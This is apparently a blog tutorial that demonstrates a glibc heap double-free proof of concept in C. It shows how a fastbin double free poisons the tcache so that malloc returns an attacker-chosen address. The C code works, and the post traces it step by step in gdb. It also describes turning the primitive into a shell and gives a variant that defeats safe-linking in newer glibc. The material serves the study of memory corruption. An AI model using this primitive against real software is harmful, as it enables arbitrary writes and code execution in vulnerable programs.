PoC double_free

Posted by l0tus on 2022-12-13

Source code

#include <stdio.h>
#include <stdlib.h>

int main()
{
    size_t *ptr[12];
    for (int i = 0; i < 12; i++)
    {
        ptr[i] = malloc(0x30);      // twelve chunks of the same size (0x40 with the header)
    }
    int a = 10;                     // a stack variable; its address is where we will redirect the list
    free(ptr[0]);                   // ptr[0]..ptr[6]: the first seven frees fill this size's tcache bin
    free(ptr[1]);
    free(ptr[2]);
    free(ptr[3]);
    free(ptr[4]);
    free(ptr[5]);
    free(ptr[6]);
    free(ptr[7]);                   // tcache is full: ptr[7]..ptr[10] go to the fast bin
    free(ptr[8]);
    free(ptr[9]);
    free(ptr[10]);
    free(ptr[9]);                   // double free: 9 is not at the top of the fast bin (10 is), so it is not detected

    for (int i = 0; i < 7; i++)
    {
        ptr[i] = malloc(0x30);      // drain the seven tcache entries
    }
    ptr[7] = malloc(0x30);          // returns chunk 9 from the fast bin; the rest of the fast bin is moved into the tcache
    *(ptr[7]) = (size_t)&a;         // chunk 9 is still in the tcache: its first word is the "next" pointer, point it at the stack
    ptr[8] = malloc(0x30);          // returns chunk 10
    ptr[9] = malloc(0x30);          // returns chunk 9 again; the next entry is now &a
    ptr[10] = malloc(0x30);         // served from the poisoned list
    ptr[11] = malloc(0x30);
    return 0;
}

compile

[screenshot: compiling the program with gcc]

debug

[screenshot: running the program under gdb]
Compiling with -g also lets gdb show the source code.
[screenshot: source view in gdb]

Check the bins once all the frees are done.
The first seven chunks (0..6) went into the tcache bin for this size, and the rest (7, 8, 9, 10) went to the fast bin.
The second free(ptr[9]) is the double free: chunk 9 is pushed onto the fast bin a second time, so the fast bin now contains a loop (9 -> 10 -> 9 -> 10 ...). The fast bin only checks that the chunk being freed is not already at the top of the list, and the top at that moment is chunk 10, so the check passes.
[screenshot: bins after the frees]

Check the bins again after the first seven mallocs. They drained the tcache, so the next malloc was served from the fast bin, and while doing that glibc moved the remaining fast bin chunks into the tcache, loop included.
[screenshot: bins after the mallocs]

Check the bins after chunk 9 came back from malloc (as ptr[7]) and we wrote &a into its first word. That word is the tcache "next" pointer, so the tcache list for this size now ends at an address on the stack.
[screenshot: bins after the overwrite]

Done.

review

This is what the tcache looks like after the double free:
[diagram: the tcache list with chunk 9 linked in twice]
Both the upper and the lower drawing are correct ways to picture it.
[diagram: the tcache list after the malloc and the overwrite]
After the malloc and the redirect.

Here comes the vulnerability: the chunk is in the free list twice, so malloc hands it to us while it is still linked in the tcache, and whatever we write into its first word becomes the next entry of the list. One more malloc then returns that address, which gives us a write to an address of our choosing. Point it at a function pointer, write the address of system there and arrange for the call to receive "/bin/sh" as its argument, and we get a shell.

Two things to keep in mind when reproducing this on another glibc: the double free has to go through the fast bin, because since glibc 2.29 a chunk freed twice into the tcache is caught by the key field ("free(): double free detected in tcache 2"), which is why the tcache is filled first; and since glibc 2.32 (safe-linking) a tcache or fast bin next pointer is stored as (address of the pointer >> 12) ^ value, so the raw &a written here would not be followed on those versions: the written value has to be mangled with the chunk's own address, and the target has to be 16-byte aligned or malloc aborts with "unaligned tcache chunk detected".
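The walkthrough above depends on the glibc version it was run on. The following is an added example, not the post's code: it repeats the same sequence (twelve 0x30 allocations, eleven frees, the second free of chunk 9, seven mallocs to drain the tcache, the poison write, three more mallocs), but stores the poisoned next pointer the way the running glibc expects, raw on versions before 2.32 and safe-linking-mangled from 2.32 on. The redirect target is a hypothetical static object called landing instead of a stack variable, so the result can be checked by comparing pointers. It assumes 64-bit glibc 2.26 or later (tcache present) and a process in which this size class has not been used before, as in the post.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#ifndef __GLIBC__
#error "this PoC relies on glibc's tcache/fastbin behaviour (glibc >= 2.26)"
#endif

/* glibc 2.32 introduced safe-linking: a tcache/fastbin "next" pointer is
 * stored as (address_of_the_pointer_slot >> 12) ^ value. Older glibc stores it raw. */
#if (__GLIBC__ > 2) || (__GLIBC__ == 2 && __GLIBC_MINOR__ >= 32)
#define SAFE_LINKING 1
#else
#define SAFE_LINKING 0
#endif

#define NCHUNKS 12
#define REQ     0x30   /* same request size as the post: 0x40-byte chunks */

/* Encode VALUE the way glibc stores a next pointer that lives at address SLOT.
 * Decoding is the same XOR, so the function is its own inverse. */
uintptr_t protect_ptr(const void *slot, uintptr_t value)
{
#if SAFE_LINKING
    return ((uintptr_t)slot >> 12) ^ value;
#else
    (void)slot;
    return value;
#endif
}

/* Assumed landing zone (stands in for the post's stack variable a). 16-byte
 * alignment is required: glibc >= 2.32 aborts on a misaligned tcache entry. */
static _Alignas(16) size_t landing[4];

/* Returns 1 if malloc() ends up returning &landing, 0 otherwise. */
int poc(void)
{
    void *volatile p[NCHUNKS];   /* volatile: keep the compiler from eliding malloc/free pairs */
    int i;

    for (i = 0; i < NCHUNKS; i++)
        p[i] = malloc(REQ);

    /* Free 0..10: the first seven fill this size's tcache bin, 7..10 go to the fast bin. */
    for (i = 0; i <= 10; i++)
        free(p[i]);
    /* Second free of chunk 9. The tcache is full, so this takes the fast bin path, whose
     * only double-free check is "is this chunk already at the top?" The top is 10. */
    free(p[9]);

    /* Drain the seven tcache entries (chunks 6..0). */
    for (i = 0; i < 7; i++)
        p[i] = malloc(REQ);

    /* tcache empty: malloc takes the fast bin head, chunk 9, and while there moves the
     * rest of the fast bin (10, 9, 10: the loop) into the tcache. */
    void *c9 = malloc(REQ);
    if (c9 != p[9])
        return 0;

    /* Chunk 9 is still linked in the tcache; its first word is the tcache next field.
     * Poison it so the entry after chunk 9 is our landing object. */
    ((uintptr_t *)c9)[0] = protect_ptr(c9, (uintptr_t)landing);

    void *c10    = malloc(REQ);   /* tcache head: chunk 10 */
    void *c9b    = malloc(REQ);   /* chunk 9 again; the head is now landing */
    void *forged = malloc(REQ);   /* the poisoned entry */

    return c10 == p[10] && c9b == c9 && forged == (void *)landing;
}

int main(void)
{
    printf("poisoned malloc returned the target: %s\n", poc() ? "yes" : "no");
    return 0;
}
```

The only difference from the post's program is the protect_ptr() call on the poison write; everything else is the same allocator sequence. Running it under gdb with the same "bins" checks as above shows the identical tcache loop on glibc before 2.32, and the mangled pointers on 2.32 and later.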

